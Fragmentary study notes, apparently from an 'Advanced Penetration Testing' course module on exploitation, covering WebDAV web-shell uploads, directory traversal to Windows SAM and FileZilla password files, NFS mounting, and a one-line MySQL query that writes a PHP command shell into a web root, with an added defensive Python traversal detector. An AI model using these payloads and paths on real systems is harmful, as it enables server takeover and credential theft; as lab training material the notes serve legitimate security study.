
Nathanf | Advanced Penetration Testing | Module 7 - Exploitation

By: Nathanf | Related Course: Advanced Penetration Testing | Published: November 14, 2016 | Modified: November 14, 2016

Notepadexploit 1

cadaver, WebDAV

Kali has pre-built web shells in different languages


Step 1 – upload a file to the server that executes code for you or allows you to execute code (web shell)

-upload a file that takes command injection via URL query parameters


This can also be done via Metasploit

-for reverse TCP, set ExitOnSession to false in the options so the handler doesn't stop listening after the first session


Notepadexploit 3

Directory traversal; dump SAM files to discover usernames and passwords

Directory traversal – can also be done from the URL

index?../../../../../bin.etc – if the browser offers to save the file, we've found it; otherwise we haven't


Windows/repair/sam – save the file, but you need the SYSKEY to access it from



FileZilla FTP

../../../../../xampp/FileZillaFTP/FileZilla Server.xml – FileZilla config file; stores passwords
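A server-side check for the traversal pattern in the notes above, written here as an added example (not code from the original notes): it decodes the requested path, normalises it and refuses anything that climbs out of the web root, then runs the same decoding over access-log lines to flag such requests. The web root, log format and log lines are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.php?page=about HTTP/1.1" 200',
    '10.0.0.9 - - "GET /index.php?page=../../../../../windows/repair/sam HTTP/1.1" 200',
    '10.0.0.9 - - "GET /index.php?page=..%252f..%252fxampp/FileZillaFTP/FileZilla%20Server.xml HTTP/1.1" 200',
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded '..' (%252e%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_request_path(web_root: str, requested: str):
    """Map a request path onto a file under web_root.

    Returns the absolute path when the request stays inside web_root, or None
    when normalisation shows it would climb out (directory traversal).
    """
    path = fully_decode(requested).replace("\\", "/")  # XAMPP on Windows accepts both
    norm = posixpath.normpath(path.lstrip("/"))
    if norm == "." or norm == "":
        return web_root
    if norm == ".." or norm.startswith("../"):
        return None
    candidate = posixpath.join(web_root, norm)
    # Belt and braces: the joined path must still sit below the root.
    if not candidate.startswith(web_root.rstrip("/") + "/"):
        return None
    return candidate


def flag_traversal(lines):
    """Return log lines whose request target still contains '../' after decoding."""
    flagged = []
    for line in lines:
        parts = line.split('"')
        if len(parts) < 2 or " " not in parts[1]:
            continue
        target = parts[1].split(" ")[1]  # 'GET /path?q HTTP/1.1' -> '/path?q'
        if "../" in fully_decode(target).replace("\\", "/"):
            flagged.append(line)
    return flagged
```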

NotepadExploit 4


search Metasploit for exploits

Notepadexploit 6

whoami = display which user you are

Notepadexploit 6

display exported network file systems: in the CLI -> showmount -e 'ip'



to mount the exported network filesystem

mount -t nfs -o nolock 'ip':/exportDir /mountpoint



hidden files: ls -a

.ssh directory stores keys



Notepadexploitation 2

open web interface – phpMyAdmin lets you run SQL commands (SQL injection-style payloads) directly


creating a system command shell which accepts a parameter via the URL, written to the server via SQL

run system command ->

select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"


\\ = escaped backslash in the MySQL string literal, so the path is written correctly and you don't end up with a mangled file name on the system


atftpd --daemon --bind-address 'ip' /tmp

netstat -antp

--daemon = it will run in the background and keep listening


other shell -> PowerShell

tftp = Trivial File Transfer Protocol
